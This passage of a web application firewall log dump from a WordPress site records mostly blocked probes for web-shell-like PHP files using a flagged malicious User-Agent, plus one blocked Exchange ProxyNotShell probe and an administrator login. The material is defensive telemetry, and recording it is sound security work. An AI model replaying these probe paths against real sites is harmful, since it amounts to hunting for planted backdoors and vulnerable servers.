User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SZWdpc3RyeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134291,1700046047.492452,1700046047.470600,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134289,1700045962.293481,1700045962.271200,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133505,1699888575.602650,1699888575.586700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Restriction.php','http://eckankar-colorado.org/wp-includes/SimplePie/Restriction.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SZXN0cmljdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134280,1700003269.233051,1700003269.211500,0x00000000000000000000FFFF5B5CF8B6,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?upload=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134279,1700000735.783379,1700000735.774400,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134282,1700021126.204837,1700021126.197100,0x00000000000000000000FFFFC6C77431,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134283,1700028250.546293,1700028250.524300,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/konzept/includes/uploadify/upload.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2tvbnplcHQvaW5jbHVkZXMvdXBsb2FkaWZ5L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134276,1700000750.010539,1700000750.001800,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134281,1700014312.117547,1700014312.095900,0x00000000000000000000FFFFC2A9AF5C,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134277,1700000744.431939,1700000744.418500,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/js/widgets/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134278,1700000739.991780,1700000739.976200,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/images/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133494,1699888580.733845,1699888580.725100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-color-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-color-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY29sb3ItY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134274,1700000771.328140,1700000771.291700,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/blue/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133503,1699888576.299131,1699888576.290500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Source.php','http://eckankar-colorado.org/wp-includes/SimplePie/Source.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Tb3VyY2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134285,1700029965.031321,1700029965.009400,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134272,1700000710.332856,1700000710.323800,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134287,1700040640.657544,1700040640.648800,0x00000000000000000000FFFF55D7A2F3,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134273,1700000777.986864,1700000777.978200,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133620,1699888532.250056,1699888532.240600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-rdf.php','http://eckankar-colorado.org/wp-includes/feed-rdf.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtcmRmLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133177,1699888484.398356,1699888484.385400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-simplepie.php','http://eckankar-colorado.org/wp-includes/class-simplepie.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXNpbXBsZXBpZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133238,1699888681.659944,1699888681.651300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/cache-wordpress/','http://eckankar-colorado.org/wp-content/plugins/cache-wordpress/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYWNoZS13b3JkcHJlc3Mv\",\"category\":\"brute-force\",\"ssl\":1}'),(133168,1699888487.535510,1699888487.526800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-admin-bar.php','http://eckankar-colorado.org/wp-includes/class-wp-admin-bar.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWFkbWluLWJhci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133117,1699837354.127472,1699837354.118800,0x00000000000000000000FFFF9DF524B2,0,403,0,0,0,'https://eckankar-colorado.org/M1.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L00xLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133109,1699825267.117575,1699825267.108300,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/atomlib.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F0b21saWIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133116,0.000000,1699827130.738443,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=48626273c4','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(133115,0.000000,1699826634.636733,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(133153,1699888492.859010,1699888492.850200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block.php','http://eckankar-colorado.org/wp-includes/class-wp-block.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133147,1699888495.039505,1699888495.017300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-nav-menus.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-nav-menus.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1uYXYtbWVudXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133145,1699888496.212021,1699888496.202700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-section.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-section.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 